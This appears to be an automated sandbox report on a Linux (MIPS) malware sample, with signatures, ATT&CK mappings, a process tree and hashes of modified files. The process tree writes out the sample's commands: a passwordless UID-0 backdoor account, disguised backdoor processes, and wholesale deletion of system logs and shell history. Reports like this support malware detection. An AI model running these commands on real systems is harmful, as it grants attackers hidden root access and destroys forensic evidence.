f3820982b2a60d3b0890dba5567da078ba20b7332f5d44c1759401bca452a2c9

Analysis

max time kernel
23s
max time network
8s
platform
debian-9_mipsel
resource
debian9-mipsel-20231215-en
resource tags

arch:mipselimage:debian9-mipsel-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
22/12/2023, 17:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb54895b9172cf81bd2f64640e01a37d
Size

6KB
MD5

fb54895b9172cf81bd2f64640e01a37d
SHA1

cf3b6bf6dcaf2316705372b456ea097ba399560b
SHA256

f3820982b2a60d3b0890dba5567da078ba20b7332f5d44c1759401bca452a2c9
SHA512

e1a739b38a912468f4a1469b55aca7f35d9c5b03f76169c114c10029a184134c272db758cf8961c4257c2988ee87ec36b90d52115ea82cb309182774095e9ced
SSDEEP

96:O75sFwotSsUKbLBrnVJTiyVSR+MpuM20725Re0Rvsc:o5sFwTKbLBrPpVSfky725Re0Rv

Score

8^/10

evasion

Malware Config

Signatures

Modifies password files for system users/ groups 10 IoCs

Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.

description	ioc	Process
File opened for modification	/etc/group	useradd
File opened for modification	/etc/gshadow	useradd
File opened for modification	/etc/shadow	passwd
File opened for modification	/etc/passwd	useradd
File opened for modification	/etc/group	useradd
File opened for modification	/etc/gshadow	useradd
File opened for modification	/etc/shadow	useradd
File opened for modification	/etc/shadow	passwd
File opened for modification	/etc/passwd	useradd
File opened for modification	/etc/shadow	useradd

Deletes system logs 1 TTPs 2 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/messages	rm
File deleted	/var/log/syslog	rm

Adds a user to the system 2 IoCs

pid	Process
766	useradd
776	useradd

Deletes log files 1 TTPs 15 IoCs

Deletes log files on the system.

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/fontconfig.log	rm
File deleted	/var/log/smail/logfile	rm
File deleted	/var/log/debug	rm
File deleted	/var/log/dpkg.log	rm
File truncated	/var/log/smail/logfile	fb54895b9172cf81bd2f64640e01a37d
File deleted	/var/log/kern.log	rm
File deleted	/var/log/wtmp	rm
File deleted	/var/log/alternatives.log	rm
File deleted	/var/log/auth.log	rm
File deleted	/var/log/btmp	rm
File deleted	/var/log/daemon.log	rm
File deleted	/var/log/faillog	rm
File deleted	/var/log/lastlog	rm
File deleted	/var/log/user.log	rm
File deleted	/var/log/sendfile/*	rm

Enumerates running processes
Discovers information about currently running processes on the system

Enumerates kernel/hardware configuration 1 TTPs 4 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/337/stat	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/73/stat	killall
File opened for reading	/proc/342/stat	killall
File opened for reading	/proc/5/stat	killall
File opened for reading	/proc/7/stat	killall
File opened for reading	/proc/704/cmdline	killall
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/82/stat	killall
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/584/stat	killall
File opened for reading	/proc/filesystems	passwd
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/695/cmdline	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/12/stat	killall
File opened for reading	/proc/681/stat	killall
File opened for reading	/proc/375/stat	killall
File opened for reading	/proc/8/stat	killall
File opened for reading	/proc/344/stat	killall
File opened for reading	/proc/704/cmdline	killall
File opened for reading	/proc/701/stat	killall
File opened for reading	/proc/144/cmdline	killall
File opened for reading	/proc/696/stat	killall
File opened for reading	/proc/116/stat	killall
File opened for reading	/proc/241/stat	killall
File opened for reading	/proc/69/stat	killall
File opened for reading	/proc/701/stat	killall
File opened for reading	/proc/18/stat	killall
File opened for reading	/proc/22/stat	killall
File opened for reading	/proc/696/cmdline	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/106/stat	killall
File opened for reading	/proc/241/stat	killall
File opened for reading	/proc/337/stat	killall
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/69/stat	killall
File opened for reading	/proc/374/stat	killall
File opened for reading	/proc/335/stat	killall
File opened for reading	/proc/71/stat	killall
File opened for reading	/proc/534/stat	killall
File opened for reading	/proc/793/stat	killall
File opened for reading	/proc/1/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/69/stat	killall
File opened for reading	/proc/79/stat	killall
File opened for reading	/proc/80/stat	killall
File opened for reading	/proc/344/stat	killall
File opened for reading	/proc/144/stat	killall
File opened for reading	/proc/344/stat	killall
File opened for reading	/proc/695/stat	killall
File opened for reading	/proc/76/stat	killall
File opened for reading	/proc/filesystems	killall
File opened for reading	/proc/167/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/16/stat	killall
File opened for reading	/proc/167/stat	killall
File opened for reading	/proc/filesystems	useradd
File opened for reading	/proc/700/stat	killall

/tmp/fb54895b9172cf81bd2f64640e01a37d
/tmp/fb54895b9172cf81bd2f64640e01a37d
1⤵
- Deletes log files
PID:711
- /bin/hostname
  hostname -i
  2⤵
  PID:714
- /usr/bin/whoami
  whoami
  2⤵
  PID:723
- /bin/tar
  tar -zxvf vf.tgz
  2⤵
  PID:725
- /etc/init.d/inetd
  /etc/init.d/inetd start
  2⤵
  PID:727
- /etc/init.d/ssh
  /etc/init.d/ssh start
  2⤵
  PID:729
- - /bin/run-parts
    run-parts --lsbsysinit --list /lib/lsb/init-functions.d
    3⤵
    PID:737
- - /bin/systemctl
    systemctl -p LoadState --value show ssh.service
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:739
- - /bin/readlink
    readlink -f /etc/init.d/ssh
    3⤵
    PID:740
- - /bin/systemctl
    systemctl -p CanReload --value show ssh.service
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:741
- - /bin/systemctl
    systemctl is-system-running
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:743
- - /bin/systemctl
    /bin/systemctl --no-pager start ssh.service
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:744
- /bin/hostname
  hostname -f
  2⤵
  PID:745
- /bin/chmod
  chmod 755 dor
  2⤵
  PID:746
- /tmp/dor
  ./dor
  2⤵
  PID:747
- /bin/chmod
  chmod 755 neo1
  2⤵
  PID:748
- /bin/chmod
  chmod 755 neo2
  2⤵
  PID:749
- /bin/chmod
  chmod 755 md5
  2⤵
  PID:750
- /bin/chmod
  chmod 755 she
  2⤵
  PID:751
- /bin/chmod
  chmod 755 hell
  2⤵
  PID:752
- /tmp/xh
  ./xh -s /bin/sh -d -p neo1.pid ./neo1 a -u 0:0
  2⤵
  PID:753
- /tmp/xh
  ./xh -s /bin/sh -d -p hell.pid ./bash
  2⤵
  PID:754
- /tmp/xh
  ./xh -s /bin/sh -d -p hell2.pid ./she a -u 0:0
  2⤵
  PID:755
- /tmp/.,
  "./.,"
  2⤵
  PID:756
- /tmp/xh
  ./xh -s /bin/sh -d -p neo2.pid ./neo2 a -u 0:0
  2⤵
  PID:757
- /tmp/xh
  ./xh -s /usr/sbin/httpd -d -p hell.pid ./bash
  2⤵
  PID:758
- /usr/bin/touch
  touch /var/log/alternatives.log /var/log/apt /var/log/audit /var/log/auth.log /var/log/btmp /var/log/daemon.log /var/log/debug /var/log/dpkg.log /var/log/exim4 /var/log/faillog /var/log/fontconfig.log /var/log/installer /var/log/kern.log /var/log/lastlog /var/log/messages /var/log/syslog /var/log/user.log /var/log/wtmp
  2⤵
  PID:759
- /bin/chmod
  chmod 744 /var/log/alternatives.log /var/log/apt /var/log/audit /var/log/auth.log /var/log/btmp /var/log/daemon.log /var/log/debug /var/log/dpkg.log /var/log/exim4 /var/log/faillog /var/log/fontconfig.log /var/log/installer /var/log/kern.log /var/log/lastlog /var/log/messages /var/log/syslog /var/log/user.log /var/log/wtmp
  2⤵
  PID:760
- /usr/bin/killall
  killall -HUP inetd
  2⤵
  - Reads runtime system information
  PID:761
- /bin/mv
  mv hell.pid /dev/tty1O
  2⤵
  PID:762
- /bin/mv
  mv hell2.pid /dev/ttys
  2⤵
  PID:763
- /bin/mv
  mv neo2.pid /dev/.c
  2⤵
  PID:764
- /bin/mv
  mv neo3.pid /dev/.d
  2⤵
  PID:765
- /usr/sbin/useradd
  useradd nobodye
  2⤵
  - Modifies password files for system users/ groups
  - Adds a user to the system
  - Reads runtime system information
  PID:766
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:767
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:768
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:769
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:770
- /usr/bin/passwd
  passwd -d nobodye
  2⤵
  - Modifies password files for system users/ groups
  - Reads runtime system information
  PID:771
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:772
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:773
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:774
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:775
- /usr/sbin/useradd
  useradd -u 0 -o -g 0 -s /bin/bash syss
  2⤵
  - Modifies password files for system users/ groups
  - Adds a user to the system
  PID:776
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:777
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:778
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:779
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:780
- /usr/bin/passwd
  passwd -d syss
  2⤵
  - Modifies password files for system users/ groups
  PID:781
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:784
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:785
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:786
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:788
- /usr/bin/killall
  killall -HUP inetd
  2⤵
  - Reads runtime system information
  PID:790
- /usr/bin/killall
  killall -HUP /usr/sbin/inetd
  2⤵
  - Reads runtime system information
  PID:791
- /usr/bin/killall
  killall -HUP inetd
  2⤵
  - Reads runtime system information
  PID:794
- /usr/bin/killall
  killall -HUP /usr/sbin/inetd
  2⤵
  PID:795
- /bin/rm
  rm vf.tgz
  2⤵
  PID:798
- /bin/rm
  rm -rf .bash
  2⤵
  PID:799
- /bin/rm
  rm neo.sh
  2⤵
  PID:800
- /bin/rm
  rm d00r.tgz
  2⤵
  PID:802
- /bin/rm
  rm neo.sh
  2⤵
  PID:804
- /bin/rm
  rm -rf .bash
  2⤵
  PID:805
- /usr/bin/clear
  clear
  2⤵
  PID:808
- /bin/sleep
  sleep 2
  2⤵
  PID:809
- /bin/rm
  rm "/var/adm/*"
  2⤵
  PID:829
- /bin/rm
  rm /var/log/alternatives.log /var/log/apt /var/log/audit /var/log/auth.log /var/log/btmp /var/log/daemon.log /var/log/debug /var/log/dpkg.log /var/log/exim4 /var/log/faillog /var/log/fontconfig.log /var/log/installer /var/log/kern.log /var/log/lastlog /var/log/messages /var/log/syslog /var/log/user.log /var/log/wtmp
  2⤵
  - Deletes system logs
  - Deletes log files
  PID:831
- /usr/bin/touch
  touch /var/log/apt /var/log/audit /var/log/exim4 /var/log/installer
  2⤵
  PID:833
- /bin/chmod
  chmod 744 /var/log/apt /var/log/audit /var/log/exim4 /var/log/installer
  2⤵
  PID:834
- /bin/chmod
  chmod 744 "/usr/local/psionic/portsentry/*"
  2⤵
  PID:836
- /bin/rm
  rm /var/log/smail/logfile
  2⤵
  - Deletes log files
  PID:840
- /bin/rm
  rm "/var/log/sendfile/*"
  2⤵
  - Deletes log files
  PID:842
- /bin/rm
  rm /root/.bash_history
  2⤵
  PID:843
- /usr/bin/touch
  touch /root/.bash_history
  2⤵
  PID:845
- /bin/rm
  rm /var/log/apt /var/log/audit /var/log/exim4 /var/log/installer
  2⤵
  PID:847
- /usr/bin/touch
  touch /var/log/apt /var/log/audit /var/log/exim4 /var/log/installer
  2⤵
  PID:849
- /bin/uname
  uname -a
  2⤵
  PID:851

/bin/grep
grep -q OpenSSH
1⤵
PID:732

/usr/sbin/sshd
/usr/sbin/sshd "-?"
1⤵
PID:731

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/group+

Filesize
715B

MD5
1c68ea19da61fd005ff5034ca8847b4a

SHA1
6ba02b331224577d38a71edeb7bffcb032edd70a

SHA256
f3be59fdb4034217d1f01c14ea3baac0e220e76a1c2ada325cdd12a00e75ba11

SHA512
27b62912cac20327072d18ca91366ee51941a0d3d89536dd9a550b2909220cda6ec62b99f874773b0626d9f562fcc2090b3d6c89e1b2643ee2ac4eb528c1cb36

Download Submit
/etc/gshadow+

Filesize
602B

MD5
2b9222abe84c8853a9bb2b8e5ac1e1d4

SHA1
5510cfce2e780806051c2971fba4a0fa8a23f53d

SHA256
73ed8030003b47a134500f7ed5e48aaa07bd37635a044aadcba42ceaeb9cbfd7

SHA512
4aa83f4b9f70866fb044f7bfd4faa599ed8ea2aa83992b283c79548faefc21747eb4ab9d5d4d018817f1d0111cf51b936e1fd37674b7faaa2fd2557cd0c4b9da

Download Submit
/etc/inetd.conf

Filesize
71B

MD5
865bdebd2e47b8ae3351dd6d23a560ce

SHA1
699c88225e5d91e2dadece5bc3f2e9ec69ff2d37

SHA256
0a1316003429761ddf1b197477b0e9a28c581dc989c250de05cef8878848f752

SHA512
ab1bc2faf53fe23b1598c233a22c41f8b91a8d5044e45b7c8a65e0d834cd296637aaddbbb3dd4c1b7183b2edfce9afb6dc39ea71ffa5a5d6307abebf765ef91d

Download Submit
/etc/inetd.conf

Filesize
113B

MD5
40e6cfb843a2a92f784cca7f668367f3

SHA1
3ec10fd1b4d0c63f46adf724ee82b3ea04c21765

SHA256
f683b57cf44ee711979e97ce0833cd5824c4882cc92f645f789d7cefa02f1b2a

SHA512
ac9a9e4ef4ad592220d19b37bd549b7cbc486a7d4642fc3102eba5f029bf3e941e29478d8f755424565f4c184fcc9d4b0b5b4cc497139a16f3baaa0fb7f87560

Download Submit
/etc/inetd.conf

Filesize
155B

MD5
77836464253ac19bc520dcf9d881be23

SHA1
8ebc900636521abe44e030894ec91a28cbea243c

SHA256
c467f790498de71469ea27978fbdc0183460419f972927f78b2375377fdd3353

SHA512
25354f4eadb531022453314dfe504655ca00ab05a96ebc08d12c083fb81134be2669d12203314497de613720a22fa22752d963cd06921b4682030000b459470e

Download Submit
/etc/inetd.conf

Filesize
210B

MD5
5c329622f53fe2fec6b2e95eadbcc2f3

SHA1
e50229188b5205518b5d2d4d491d82080ab3d907

SHA256
0e233905f642f7256d5e07104f3eb7c50aa5fd9ffbea70f521df5985caa66b2d

SHA512
9906dee555604d44f05a691594b721e255122250910f76781bc145ab8a671b1f43376299d8f847672c6625f550fafa5a1bd888c18bf7064ad5ea6cf220a9f4a8

Download Submit
/etc/passwd+

Filesize
1KB

MD5
79b28fbe80c10b47e680b825a5cc4faa

SHA1
b363912be6a69d05d6586cf114beb5183e334c63

SHA256
cbe89ff22c2de21bfcd95a9606496e4b605a5d998919bfa846c266c061e0419a

SHA512
5a5602b3b03a219226dc7ff27d250348457ac4c761632b81d6775ae7676a0f2d61674ef9efb112b48f3c9a0b55fedcf28d1a7e9b4a7b5e165942983ece39c82b

Download Submit
/etc/passwd+

Filesize
1KB

MD5
4ce516246eaf8c166370f28c073a3c55

SHA1
61150d13e2a4b04ba88ddd6b5743e36f2a4386bd

SHA256
c70cd6ff5f751d3540a3d477c6904bd9c623e7d34ee41b60dbe4714b5ffe657e

SHA512
9eb91205dab0cb2a8d0e3851447b011c5d2efd4df0fc8cd66d20fd70eee1dea291ce3ad5edf9d69f5bdb1d9703b597edd9f8e9e3f232479892a61af646e6c587

Download Submit
/etc/shadow+

Filesize
922B

MD5
6eca4bf493ea05045a373b2b8a74fea1

SHA1
f19a55cdb4d7ba8232a3708b5d6fd13e4f8c7d7f

SHA256
98a3fb567e6da607b8d1cece03d7cd19f017fb69bc1e26fc4e3bd547716d25fb

SHA512
5330a9c9588ab1c8a69d58825e7da7082d333922f0f2116f616fac823764670a7a387031cbc4d3e74e0395771b79a8991062a659f0eae22df18a32a725cf2cb8

Download Submit
/etc/shadow+

Filesize
921B

MD5
c76145f0938bae0eb56f52eb05aa1003

SHA1
3bb708a57c68473aacebe02a477a91120c3d702a

SHA256
9e075d01869a21f5dc36d17e34db5ffd686aa4f47acc832e6c771a5c64f4b7d9

SHA512
0586c0640bec60348eba466bcad0e2b168fcc870a56b23a07f8ea5fe8d8b808cffc830f717622960d33f5abf609a8cde357d7848350f86a1a3913f84ff1b8e38

Download Submit
/etc/shadow+

Filesize
897B

MD5
b735e12c3181f590836ed9af6501cb5d

SHA1
0a5d0285e5acfee554f0c8a82228583ec7edef55

SHA256
70d40a286d26f039da86913aa47efc46b7faf0ff2c0b518b3f5a604da24dc9f2

SHA512
b5ba79e1437452ec8f120a06a5a3f3ff99cd05701a2d18f3cac997be4e8630a08b85ca45117dde6fd0b70aee9eefed5869f029e8d48cc1be59670ece74944208

Download Submit
/etc/shadow+

Filesize
896B

MD5
78b01afa5a5a4bc2669a33c97f0501f4

SHA1
2c7b625ee931770709c34c46cf1266a7fcaa78b0

SHA256
20a780760b6acd70b873b1369538922a7fd62ebedbad074c71d5b3391a5abecc

SHA512
86997bf5cab430da4e0117a023b1007d36a763ada133d648abe96b0c7f5c531c8eac879be1968a1cf784c5a5d72184f2f1b199e042377da3f31f6381ae9303fa

Download Submit
/etc/subuid+

Filesize
57B

MD5
fef84338f1a1a03416174da1b5dd3cf3

SHA1
181c0e1ddd5c37430cca417b0181d76fb75bfb53

SHA256
51da847b6a2634ca8d7869d3c6add818351654f9dbc1b5e4730a91ca5cfb2c93

SHA512
cbd9d2ade356e7793468c5f530d4107d7d321fe82cd4fe80d00404d5a77c371e31f1fbfd494362276644aa1bdec45569f26d0c587ddabbe9901fe23ef5356acb

Download Submit
/etc/subuid+

Filesize
39B

MD5
2bf187abcd598f6789ea835ee49e3d15

SHA1
50dde212e4a7a253f685c88df63e5ffe1a455d86

SHA256
43341e0286b16ee4347f725a1c02b3e156c2d80f1b47a2de2d7c7ba4a04869d7

SHA512
77e886b13365c0e4be375553ce4bd3297ea0893f39413025ecb3decdb5c8be7e64d9fa05f2f5b2b73a6ba0d162675ae6680e5ae451fd133609476aa763ea566e

Download Submit
/root/.bash_history

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads